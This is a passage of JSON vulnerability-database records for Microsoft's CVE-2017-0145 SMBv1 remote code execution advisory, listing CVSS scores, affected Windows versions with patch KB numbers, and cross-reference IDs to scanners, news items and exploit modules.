"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T10:51:44", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T10:51:44", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4014077", "KB4012216", "KB4012606", "KB3212646", "KB3177186", "KB4012213", "KB3205401", "KB4012598", "KB4012212", "KB3205409", "KB3210720", "KB4012217", "KB4012214", "KB3213986", "KB4013429", "KB4012215", "KB4013198", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T10:51:44", "differentElements": ["msAffectedSoftware"], "edition": 62}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "4b3c58a0de4c835f521b07a7a1b9b647", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T14:49:48", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB4014077", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit 
Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based 
Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": 
""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T14:49:48", "differentElements": ["msAffectedSoftware"], "edition": 63}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T16:52:15", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": 